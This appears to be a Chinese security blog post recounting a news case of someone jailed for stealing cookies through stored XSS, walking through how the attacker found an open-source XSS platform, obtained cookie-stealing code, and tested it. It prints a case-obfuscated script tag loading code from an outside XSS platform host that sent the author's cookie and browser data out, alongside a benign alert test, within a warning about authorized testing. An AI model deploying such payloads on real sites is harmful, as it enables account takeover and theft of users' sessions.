从 xss 反打到进小黑屋的故事
2022-10-26 09:57:29 Author: 信安之路(查看原文) 阅读量:29 收藏

今日看到一条微博,微博内容是这样的:

关于这个新闻,首先科普一下犯罪过程:

1、互联网搜索 XSS 找到跨站漏洞攻击平台

百度搜索 xss 关键词,翻了几页还真找到了一个在线平台:

赶紧打开看看能不能用,界面很不错:

注册发现,需要邀请码,但是这个平台是一个开源项目,已经有很多人在玩,那么通过关键词 xss-platform 来进行搜索,可以发现很多不需要验证码的平台,找一个注册账号进去看看:

2、通过该平台获取攻击代码,插入相关网站

有了攻击平台之后,找一下新闻中的攻击代码,因为是要获取 cookie 信息,所以找获取 cookie 的功能即可,创建一个测试 cookie 的项目,选择:

接下来查看攻击代码:

到这里就已经有了攻击代码。

3、将攻击代码插入到存在 XSS 漏洞的网站

从新闻中的结果来看,获取到六十多条 cookie 信息,还包含了管理员的,猜出是存储型的 XSS 漏洞,也就是插入的代码保存到数据库,只要有人访问那个被插入恶意代码的页面即可出发恶意代码,从而被盗取 cookie。

有人会问,盗取 cookie 有啥用?有了 cookie,就可以登录你的账户,接管你的账户,你登录之后能做的操作,攻击者都可以做,包括花你的钱,修改你的资料等等。

我们也来试试,首先得找到存在 XSS 漏洞的网站,对于白帽子而言,找到漏洞,第一时间应该提交到相关平台,督促官方修复漏洞,而测试漏洞是否存在,无需使用攻击平台,只要能弹窗就行,弹窗脚本:

<script>alert(1)</script>

为了测试,我写了一个存在 xss 漏洞的测试页,内容如图:

将上面的弹窗代码带入参数,访问如图:

到这里,就已经可以证明漏洞存在了,作为白帽子的测试已经结束,提交漏洞即可,无需进一步测试。

但是新闻中的主人公,使用了攻击平台,插入了获取 cookie 的代码,我们试试插入攻击代码之后的效果:

<sCRiPt sRC=//xss.yt/Nz9U></sCrIpT>

页面上没有任何反应,但是看看 xss 攻击平台有没有结果,看到一条新记录:

包含了我的 cookie、页面标题、远程 IP 地址、操作系统、浏览器等信息,而新闻中的主人公获取了六十多人的记录,相当于获得了六十多人的账号权限,这是不应该做的,也是违法的主要原因。

对于提供获取 Cookie 信息的平台也是具有连带责任的,属于为违法犯罪提供帮助,这也是不允许的。

4、总结

在互联网上做测试,一定不能越界,无论是出于何种目的,获取用户敏感数据,攻击在线平台都是不允许的,都存在未授权测试的违法行为,如果是白帽子,测试漏洞一定要点到为止,不能进行深入利用,如果作为红队成员,一定在授权的范围内进行测试,锻炼技术就打靶场吧,千万不要未授权实战利用漏洞,来提升自己的能力,越界后,将追悔莫及。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247498093&idx=1&sn=e33a44c193cf5d34635cb5cea420704e&chksm=ec1dc945db6a40539a434a9c85592e058e4bd39bc7b1d9c6a2acf2716a2fe38a6b470a766bc6#rd
如有侵权请联系:admin#unsafe.sh